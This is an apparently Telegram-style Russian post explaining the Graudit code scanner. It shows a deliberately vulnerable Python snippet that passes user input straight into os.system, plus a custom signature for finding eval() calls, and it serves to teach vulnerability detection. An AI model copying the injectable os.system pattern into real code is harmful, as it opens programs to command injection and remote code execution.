Graudit обнаружит эту уязвимость, так как в сигнатурах PHP есть правило для SQL-запросов с прямым включением пользовательского ввода.

🟧 Python: Command Injection
import os
user_input = input("Enter filename: ")
os.system(f"cat {user_input}") # Уязвимость!
Graudit выдаст предупреждение, так как os.system с внешними данными — это риск RCE.

🟧
Расширение возможностей Graudit
Можно добавлять свои сигнатуры в /signatures/custom.db:
Пример правила для поиска опасных функций в Pythonlabel: Dangerous Python eval()pattern: eval\(.*\$
Теперь при сканировании Python-кода Graudit будет искать eval().

🟧 Используйте Graudit в связке с:
🟧 Bandit (для Python)
🟧 Semgrep (для глубокого анализа)
🟧 SonarQube (для комплексного сканирования)

Читать полностью…
Subscribe to a channel